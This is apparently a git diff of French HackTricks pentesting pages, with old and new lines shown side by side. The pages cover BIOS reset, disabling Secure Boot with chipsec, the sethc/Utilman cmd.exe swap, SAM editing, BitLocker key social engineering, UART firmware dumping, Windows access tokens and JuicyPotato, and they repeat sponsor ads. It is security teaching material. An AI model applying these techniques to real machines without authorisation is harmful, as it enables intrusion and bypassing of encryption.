<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.

View file

@ -9,14 +9,14 @@ Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -30,15 +30,15 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
## Récupération du mot de passe du BIOS et sécurité du système
La **réinitialisation du BIOS** peut être réalisée de plusieurs manières. La plupart des cartes mères incluent une **pile** qui, lorsqu'elle est retirée pendant environ **30 minutes**, réinitialisera les paramètres du BIOS, y compris le mot de passe. Alternativement, un **cavalier sur la carte mère** peut être ajusté pour réinitialiser ces paramètres en connectant des broches spécifiques.
La réinitialisation du BIOS peut être réalisée de plusieurs manières. La plupart des cartes mères incluent une **pile** qui, lorsqu'elle est retirée pendant environ **30 minutes**, réinitialisera les paramètres du BIOS, y compris le mot de passe. Alternativement, un **cavalier sur la carte mère** peut être ajusté pour réinitialiser ces paramètres en connectant des broches spécifiques.
Dans les situations où les ajustements matériels ne sont pas possibles ou pratiques, des **outils logiciels** offrent une solution. Exécuter un système à partir d'un **Live CD/USB** avec des distributions comme **Kali Linux** donne accès à des outils comme **_killCmos_** et **_CmosPWD_**, qui peuvent aider à la récupération du mot de passe du BIOS.
Dans les situations où les ajustements matériels ne sont pas possibles ou pratiques, des **outils logiciels** offrent une solution. Exécuter un système à partir d'un **Live CD/USB** avec des distributions comme **Kali Linux** donne accès à des outils comme **_killCmos_** et **_CmosPWD_**, qui peuvent aider à récupérer le mot de passe du BIOS.
Dans les cas où le mot de passe du BIOS est inconnu, le saisir incorrectement **trois fois** entraînera généralement un code d'erreur. Ce code peut être utilisé sur des sites Web comme [https://bios-pw.org](https://bios-pw.org) pour potentiellement récupérer un mot de passe utilisable.
### Sécurité UEFI
Pour les systèmes modernes utilisant l'**UEFI** au lieu du BIOS traditionnel, l'outil **chipsec** peut être utilisé pour analyser et modifier les paramètres UEFI, y compris la désactivation du **Secure Boot**. Cela peut être accompli avec la commande suivante :
Pour les systèmes modernes utilisant **UEFI** au lieu du BIOS traditionnel, l'outil **chipsec** peut être utilisé pour analyser et modifier les paramètres UEFI, y compris la désactivation du **Secure Boot**. Cela peut être accompli avec la commande suivante :
`python chipsec_main.py -module exploits.secure.boot.pk`
@ -52,7 +52,7 @@ La RAM conserve les données brièvement après la coupure de l'alimentation, g
### Live CD/USB pour l'accès au système
Changer les binaires système comme **_sethc.exe_** ou **_Utilman.exe_** avec une copie de **_cmd.exe_** peut fournir une invite de commande avec des privilèges système. Des outils comme **chntpw** peuvent être utilisés pour modifier le fichier **SAM** d'une installation Windows, permettant des changements de mot de passe.
Changer les binaires système comme **_sethc.exe_** ou **_Utilman.exe_** par une copie de **_cmd.exe_** peut fournir une invite de commande avec des privilèges système. Des outils comme **chntpw** peuvent être utilisés pour modifier le fichier **SAM** d'une installation Windows, permettant des changements de mot de passe.
**Kon-Boot** est un outil qui facilite la connexion aux systèmes Windows sans connaître le mot de passe en modifiant temporairement le noyau Windows ou l'UEFI. Plus d'informations peuvent être trouvées sur [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
@ -70,7 +70,7 @@ Des périphériques comme **Rubber Ducky** et **Teensyduino** servent de platefo
#### Copie d'ombre de volume
Les privilèges administratifs permettent la création de copies de fichiers sensibles, y compris le fichier **SAM**, via PowerShell.
Les privilèges d'administrateur permettent la création de copies de fichiers sensibles, y compris le fichier **SAM**, via PowerShell.
### Contournement du chiffrement BitLocker
@ -78,4 +78,30 @@ Le chiffrement BitLocker peut potentiellement être contourné si le **mot de pa
### Ingénierie sociale pour l'ajout de clé de récupération
Une nouvelle clé de récupération BitLocker peut être ajoutée grâce à des tactiques d'ingénierie sociale, convaincant un utilisateur d'exécuter une commande qui ajoute une nouvelle clé de récupération composée de zéros, simplifiant ainsi le processus de déchiffrement.
Une nouvelle clé de récupération BitLocker peut être ajoutée grâce à des tactiques d'ingénierie sociale, en convaincant un utilisateur d'exécuter une commande qui ajoute une nouvelle clé de récupération composée de zéros, simplifiant ainsi le processus de déchiffrement.
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>

View file

@ -2,21 +2,21 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -32,7 +32,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
UART est un protocole série, ce qui signifie qu'il transfère des données entre les composants un bit à la fois. En revanche, les protocoles de communication parallèle transmettent des données simultanément via plusieurs canaux. Les protocoles série courants incluent RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express et USB.
Généralement, la ligne est maintenue haute (à une valeur logique 1) lorsque l'UART est à l'état inactif. Ensuite, pour signaler le début d'un transfert de données, l'émetteur envoie un bit de démarrage au récepteur, pendant lequel le signal est maintenu bas (à une valeur logique 0). Ensuite, l'émetteur envoie cinq à huit bits de données contenant le message réel, suivi éventuellement d'un bit de parité et d'un ou deux bits d'arrêt (avec une valeur logique 1), selon la configuration. Le bit de parité, utilisé pour la vérification des erreurs, est rarement vu en pratique. Le bit d'arrêt (ou les bits) signifient la fin de la transmission.
Généralement, la ligne est maintenue haute (à une valeur logique 1) lorsque l'UART est à l'état inactif. Ensuite, pour signaler le début d'un transfert de données, l'émetteur envoie un bit de démarrage au récepteur, pendant lequel le signal est maintenu bas (à une valeur logique 0). Ensuite, l'émetteur envoie cinq à huit bits de données contenant le message réel, suivi d'un bit de parité facultatif et d'un ou deux bits d'arrêt (avec une valeur logique 1), selon la configuration. Le bit de parité, utilisé pour la vérification des erreurs, est rarement vu en pratique. Le bit d'arrêt (ou les bits) signifient la fin de la transmission.
Nous appelons la configuration la plus courante 8N1 : huit bits de données, pas de parité et un bit d'arrêt. Par exemple, si nous voulions envoyer le caractère C, ou 0x43 en ASCII, dans une configuration UART 8N1, nous enverrions les bits suivants : 0 (le bit de démarrage) ; 0, 1, 0, 0, 0, 0, 1, 1 (la valeur de 0x43 en binaire), et 0 (le bit d'arrêt).
@ -46,7 +46,7 @@ Outils matériels pour communiquer avec UART :
### Identification des ports UART
UART a 4 ports : **TX** (Transmettre), **RX** (Recevoir), **Vcc** (Tension) et **GND** (Masse). Vous pourriez trouver 4 ports avec les lettres **`TX`** et **`RX`** **écrites** sur le PCB. Mais s'il n'y a pas d'indication, vous pourriez devoir essayer de les trouver vous-même en utilisant un **multimètre** ou un **analyseur logique**.
UART a 4 ports : **TX** (Transmettre), **RX** (Recevoir), **Vcc** (Tension) et **GND** (Masse). Vous pourriez trouver 4 ports avec les lettres **`TX`** et **`RX`** **écrites** sur le PCB. Mais s'il n'y a pas d'indication, vous pourriez avoir besoin d'essayer de les trouver vous-même en utilisant un **multimètre** ou un **analyseur logique**.
Avec un **multimètre** et l'appareil éteint :
@ -57,17 +57,17 @@ Avec un **multimètre** et l'appareil éteint :
Vous pouvez confondre les broches TX et RX et rien ne se passera, mais si vous confondez la broche GND et la broche VCC, vous pourriez endommager le circuit.
Dans certains appareils cibles, le port UART est désactivé par le fabricant en désactivant RX ou TX ou même les deux. Dans ce cas, il peut être utile de retracer les connexions sur la carte de circuit imprimé et de trouver un point de rupture. Un indice fort confirmant l'absence de détection de l'UART et la rupture du circuit est de vérifier la garantie de l'appareil. Si l'appareil a été expédié avec une garantie, le fabricant laisse quelques interfaces de débogage (dans ce cas, UART) et a donc dû déconnecter l'UART et le reconnecter lors du débogage. Ces broches de rupture peuvent être connectées par soudure ou fils de cavalier.
Dans certains appareils cibles, le port UART est désactivé par le fabricant en désactivant RX ou TX ou même les deux. Dans ce cas, il peut être utile de retracer les connexions dans la carte de circuit imprimé et de trouver un point de rupture. Un indice fort confirmant l'absence de détection de l'UART et la rupture du circuit est de vérifier la garantie de l'appareil. Si l'appareil a été expédié avec une garantie, le fabricant laisse quelques interfaces de débogage (dans ce cas, UART) et donc, doit avoir déconnecté l'UART et le reconnecterait pendant le débogage. Ces broches de rupture peuvent être connectées par soudure ou fils de cavalier.
### Identification du débit binaire UART
La manière la plus simple d'identifier le débit binaire correct est d'examiner la **sortie de la broche TX et d'essayer de lire les données**. Si les données que vous recevez ne sont pas lisibles, passez au débit binaire possible suivant jusqu'à ce que les données deviennent lisibles. Vous pouvez utiliser un adaptateur USB vers série ou un appareil polyvalent comme Bus Pirate pour cela, associé à un script d'aide, tel que [baudrate.py](https://github.com/devttys0/baudrate/). Les débits binaires les plus courants sont 9600, 38400, 19200, 57600 et 115200.
La manière la plus simple d'identifier le débit binaire correct est de regarder la **sortie de la broche TX et essayer de lire les données**. Si les données que vous recevez ne sont pas lisibles, passez au débit binaire possible suivant jusqu'à ce que les données deviennent lisibles. Vous pouvez utiliser un adaptateur USB vers série ou un appareil polyvalent comme Bus Pirate pour cela, associé à un script d'aide, tel que [baudrate.py](https://github.com/devttys0/baudrate/). Les débits binaires les plus courants sont 9600, 38400, 19200, 57600 et 115200.
{% hint style="danger" %}
Il est important de noter que dans ce protocole, vous devez connecter le TX d'un appareil au RX de l'autre !
{% endhint %}
## Adaptateur CP210X UART vers TTY
## Adaptateur UART vers TTY CP210X
La puce CP210X est utilisée dans de nombreuses cartes de prototypage comme NodeMCU (avec esp8266) pour la communication série. Ces adaptateurs sont relativement peu coûteux et peuvent être utilisés pour se connecter à l'interface UART de la cible. L'appareil a 5 broches : 5V, GND, RXD, TXD, 3.3V. Assurez-vous de connecter la tension prise en charge par la cible pour éviter tout dommage. Enfin, connectez la broche RXD de l'adaptateur à TXD de la cible et la broche TXD de l'adaptateur à RXD de la cible.
@ -181,13 +181,13 @@ L'extraction du firmware à partir de la console UART nécessite d'abord d'accé
Pour accéder au chargeur d'amorçage <b>boot</b>, connectez le port UART à l'ordinateur et utilisez l'un des outils de console série tout en maintenant l'alimentation du dispositif déconnectée. Une fois la configuration prête, appuyez sur la touche Entrée et maintenez-la enfoncée. Enfin, connectez l'alimentation au dispositif et laissez-le démarrer.
Cela interrompra le chargement de <b>uboot</b> et affichera un menu. Il est recommandé de comprendre les commandes <b>uboot</b> et d'utiliser le menu d'aide pour les répertorier. Il pourrait s'agir de la commande `help`. Comme différents fabricants utilisent différentes configurations, il est nécessaire de les comprendre séparément.
Cela interrompra le chargement de <b>uboot</b> et affichera un menu. Il est recommandé de comprendre les commandes de <b>uboot</b> et d'utiliser le menu d'aide pour les répertorier. Il pourrait s'agir de la commande `help`. Comme différents fabricants utilisent différentes configurations, il est nécessaire de les comprendre séparément.
Généralement, la commande pour extraire le firmware est :
```
md
```
qui signifie "dump de mémoire". Cela va vider la mémoire (contenu de l'EEPROM) sur l'écran. Il est recommandé de journaliser la sortie de la console série avant de commencer la procédure pour capturer le dump de mémoire.
qui signifie "dump de mémoire". Cela va afficher le contenu de la mémoire (EEPROM) à l'écran. Il est recommandé de journaliser la sortie de la console série avant de commencer la procédure pour capturer le dump de mémoire.
Enfin, supprimez simplement toutes les données inutiles du fichier journal et enregistrez le fichier sous le nom `nomfichier.rom` et utilisez binwalk pour extraire le contenu:
```
@ -195,16 +195,16 @@ binwalk -e <filename.rom>
```
Cela listera les contenus possibles de l'EEPROM selon les signatures trouvées dans le fichier hexadécimal.
Cependant, il est nécessaire de noter que ce n'est pas toujours le cas que le <b>uboot</b> soit déverrouillé même s'il est utilisé. Si la touche Entrée ne fait rien, vérifiez les différentes touches comme la touche Espace, etc. Si le chargeur d'amorçage est verrouillé et n'est pas interrompu, cette méthode ne fonctionnerait pas. Pour vérifier si <b>uboot</b> est le chargeur d'amorçage du périphérique, vérifiez la sortie sur la console UART lors du démarrage du périphérique. Il pourrait mentionner <b>uboot</b> lors du démarrage.
Cependant, il est nécessaire de noter que ce n'est pas toujours le cas que le <b>uboot</b> soit déverrouillé même s'il est utilisé. Si la touche Entrée ne fait rien, vérifiez les différentes touches comme la touche Espace, etc. Si le chargeur d'amorçage est verrouillé et n'est pas interrompu, cette méthode ne fonctionnera pas. Pour vérifier si <b>uboot</b> est le chargeur d'amorçage du périphérique, vérifiez la sortie sur la console UART lors du démarrage du périphérique. Il pourrait mentionner <b>uboot</b> lors du démarrage.
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Leur objectif principal est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -217,10 +217,10 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -8,13 +8,13 @@
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Partagez vos astuces de piratage en soumettant des PR aux** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -28,7 +28,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
## Jetons d'accès
Chaque **utilisateur connecté** au système **détient un jeton d'accès avec des informations de sécurité** pour cette session de connexion. Le système crée un jeton d'accès lorsque l'utilisateur se connecte. **Chaque processus exécuté** au nom de l'utilisateur **dispose d'une copie du jeton d'accès**. Le jeton identifie l'utilisateur, les groupes de l'utilisateur et les privilèges de l'utilisateur. Un jeton contient également un SID de connexion (Security Identifier) qui identifie la session de connexion actuelle.
Chaque **utilisateur connecté** au système **détient un jeton d'accès avec des informations de sécurité** pour cette session de connexion. Le système crée un jeton d'accès lorsque l'utilisateur se connecte. **Chaque processus exécuté** au nom de l'utilisateur **a une copie du jeton d'accès**. Le jeton identifie l'utilisateur, les groupes de l'utilisateur et les privilèges de l'utilisateur. Un jeton contient également un SID de connexion (Security Identifier) qui identifie la session de connexion actuelle.
Vous pouvez voir ces informations en exécutant `whoami /all`
```
@ -94,18 +94,16 @@ Vous pouvez lancer un processus qui **utilise des informations d'identification
```
runas /user:domain\username /netonly cmd.exe
```
Cela est utile si vous avez des informations d'identification utiles pour accéder à des objets dans le réseau mais que ces informations d'identification ne sont pas valides à l'intérieur de l'hôte actuel car elles ne seront utilisées que dans le réseau (dans l'hôte actuel, vos privilèges utilisateur actuels seront utilisés).
### Types de jetons
Il existe deux types de jetons disponibles :
* **Jeton principal** : Il sert de représentation des informations d'identification de sécurité d'un processus. La création et l'association de jetons principaux avec des processus sont des actions qui nécessitent des privilèges élevés, mettant en avant le principe de séparation des privilèges. En général, un service d'authentification est responsable de la création du jeton, tandis qu'un service de connexion gère son association avec l'interpréteur de commandes de l'utilisateur. Il est à noter que les processus héritent du jeton principal de leur processus parent lors de leur création.
* **Jeton d'usurpation** : Permet à une application serveur d'adopter temporairement l'identité du client pour accéder à des objets sécurisés. Ce mécanisme est stratifié en quatre niveaux d'opération :
* **Anonyme** : Accorde à un serveur un accès similaire à celui d'un utilisateur non identifié.
* **Identification** : Permet au serveur de vérifier l'identité du client sans l'utiliser pour accéder aux objets.
* **Usurpation** : Permet au serveur de fonctionner sous l'identité du client.
* **Délégation** : Similaire à l'Usurpation mais inclut la capacité d'étendre cette supposition d'identité aux systèmes distants avec lesquels le serveur interagit, assurant la préservation des informations d'identification.
- **Jeton principal** : Il sert de représentation des informations d'identification de sécurité d'un processus. La création et l'association de jetons principaux avec des processus sont des actions qui nécessitent des privilèges élevés, mettant en avant le principe de séparation des privilèges. En général, un service d'authentification est responsable de la création du jeton, tandis qu'un service de connexion gère son association avec l'interface système de l'utilisateur. Il est à noter que les processus héritent du jeton principal de leur processus parent lors de leur création.
- **Jeton d'usurpation** : Permet à une application serveur d'adopter temporairement l'identité du client pour accéder à des objets sécurisés. Ce mécanisme est stratifié en quatre niveaux d'opération :
- **Anonyme** : Accorde à un serveur un accès similaire à celui d'un utilisateur non identifié.
- **Identification** : Permet au serveur de vérifier l'identité du client sans l'utiliser pour accéder aux objets.
- **Usurpation** : Permet au serveur de fonctionner sous l'identité du client.
- **Délégation** : Similaire à l'Usurpation, mais inclut la capacité d'étendre cette supposition d'identité aux systèmes distants avec lesquels le serveur interagit, assurant la préservation des informations d'identification.
#### Usurper des jetons
@ -123,18 +121,17 @@ Jetez un œil à [**tous les privilèges de jetons possibles et quelques défini
## Références
En savoir plus sur les jetons dans ces tutoriels : [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) et [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
Apprenez-en davantage sur les jetons dans ces tutoriels : [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) et [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
### [WhiteIntel](https://whiteintel.io)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
L'objectif principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur :
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
{% embed url="https://whiteintel.io" %}

View file

@ -2,19 +2,19 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Travaillez-vous dans une **entreprise de cybersécurité**? Voulez-vous voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Travaillez-vous dans une **entreprise de cybersécurité**? Vous voulez voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord** ou le **groupe Telegram** ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -27,7 +27,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
---
{% hint style="warning" %}
**JuicyPotato ne fonctionne pas** sur Windows Server 2019 et Windows 10 à partir de la version 1809. Cependant, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) peuvent être utilisés pour **exploiter les mêmes privilèges et obtenir un accès au niveau de `NT AUTHORITY\SYSTEM`**. _**Vérifiez :**_
**JuicyPotato ne fonctionne pas** sur Windows Server 2019 et Windows 10 à partir de la version 1809. Cependant, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) peuvent être utilisés pour **exploiter les mêmes privilèges et obtenir un accès au niveau `NT AUTHORITY\SYSTEM`**. _**Vérifiez :**_
{% endhint %}
{% content-ref url="roguepotato-and-printspoofer.md" %}
@ -36,19 +36,19 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
## Juicy Potato (abusant des privilèges dorés) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
